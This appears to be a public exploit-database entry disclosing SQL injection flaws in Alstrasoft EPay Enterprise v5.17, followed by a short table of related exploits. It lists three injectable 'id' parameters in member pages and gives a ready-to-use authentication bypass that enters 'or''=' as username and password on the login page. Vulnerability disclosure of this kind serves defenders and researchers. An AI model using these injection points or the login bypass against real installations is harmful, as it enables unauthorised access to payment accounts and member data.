# # # # # # Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection # Google Dork: N/A # Date: 04.02.2017 # Vendor Homepage: http://www.alstrasoft.com/ # Software Buy: http://www.alstrasoft.com/epay_enterprise.htm # Demo: http://blizsoft.com/enterprise/ # Version: 5.17 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/members/userinfo.htm?id=[SQL] # http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update # http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update # Authentication Bypass : # http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter. # # # # #
Related Exploits
Other Possible E-DB Search Terms: Alstrasoft EPay Enterprise 5.17, Alstrasoft EPay EnterpriseDate | D | V | Title | Author |
---|---|---|---|---|
2011-12-06 |
![]() |
Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection | Don |